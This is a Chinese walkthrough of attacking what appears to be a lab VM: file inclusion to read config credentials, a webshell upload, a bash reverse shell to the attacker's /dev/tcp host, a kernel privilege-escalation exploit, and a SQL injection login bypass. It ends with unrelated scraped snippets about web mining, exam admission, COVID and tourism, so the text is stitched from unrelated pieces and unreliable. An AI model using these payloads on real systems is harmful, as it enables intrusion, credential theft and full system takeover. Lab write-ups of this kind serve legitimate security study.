使用nmap或netdiscover扫描确定其ip
访问其80端口
发现是一个登入界面,使用御剑后台扫描工具和kali的dirb扫描网站目录
御剑扫描结果:
dirb扫描结果:
现在收集到的信息有:
http://192.168.220.143/add.php文件上传
http://192.168.220.143/in/? ? phpinfo()
http://192.168.220.143/phpmyphpMyAdmin
http://192.168.220.143/test文件包含
访问192.168.220.143/test.php使用brup抓包
将请求 *** 改为post
在Params中加参数file和对应的内容
单包发送,得到对应文件的内容
证明该页面存在文件包含漏洞,查看c.php(猜测可能是配置文件)
得到数据库连接用户名密码,在phpMyAdmin页面使用用户名密码登入
成功登入,得到登入web界面的用户名密码
成功登入web界面
选择添加用户,发现可以上传文件,开始上传一句话图片木马
访问http://192.168.220.143/panel.php?1=phpinfo(); 使用brup抓包,修改load参数为图片地址
发现成功显示了phpinfo() ,说明可以反弹shell
使用brup的编码模块对echo 'bash -i >& /dev/tcp/192.168.220.146/4444 0>&1' | bash进行url编码
注意:ip是kali的ip,端口是监听的端口,要写单引号
在kali中开启监听
使用burp构造payload,点击Go访问
注意:url编码的代码要加到system("");里
成功反弹shell
查看那个目录有写权限,打算写一个一句话木马
进入uploaded_images目录,写木马
拿到webshell,查看系统和内核版本
使用kali的searchsploit命令搜索提权代码,使用37292.c提权,下载文件到kali
然后拷贝到真机,绕后通过菜刀上传到目标机器
编译提权文件
执行编译后的执行文件,成功提权到root权限
爆破phpmy目录下的文件
使用文件包含漏洞,查看config.inc.php文件内容
可以看到账号密码,直接使用此账号密码ssh连接目标主机,拿到root权限
使用文件包含漏洞查看index.php源码,分析其过滤规则,然后构造payload绕过
最后测试出uname=or 1=1#? pass=\? ? 能成功登入
加 \ 号是为了让后面的unmae逃逸出来,使用此payload的后的sql语句:
select * from auth where pass='\' and uname=' or 1=1#'
网页挖矿进犯它根本上就像运用任何其他JavaScript数组相同,除了运用ArrayBuffer之外,你不能将任何JavaScript类型放入其间,例如目标或字符串。 仅有能够放入的是字节,能够运用数...
考研录取状态显示自由可投是什么意思? 档案录取状态自由可投的意思是指考生档案仍在资料库尚未投出或已投出而被学校退档。档案录取状态自由可投的原因 时间未到,考生的录取工作还未开始,这时只需耐心等待即可。...
在这将近一年的时间里,新冠肺炎疫情是大家共同关注的焦点,在这段时间里,新冠疫苗有了突破性的进展,同时新冠病毒的变异也让大家产生了担心,大家担心病毒变异会对疫苗效果产生影响。不过在9月18日,陈薇称病毒...
继得克萨斯州和加利福尼亚州之后,2日,佛罗里达州成为美国第三个新冠肺炎累计确诊病例超过100万的州。而目前,全世界累计确诊病例超过百万的国家也不过12个。 就在佛罗里达州病例数突破百万的前一...
本文导读目录: 1、微信附近的人搜的服务是真的吗 2、微信附近的人约靠谱吗 3、微信附近友约是真的吗? 4、微信附近的人上认识的男人靠谱吗? 5、微信附近的人可靠吗? 6、微信附近...
山海关旅游景点:孟姜女庙、老龙头、天下第一关古城(天下第一关箭楼、靖边楼、牧营楼、临闾楼、瑞莲阁公园、瓮城)。。 山海关景点有老龙头(60元),第一关(50元),角山(30元),孟姜女庙(30元)。秦...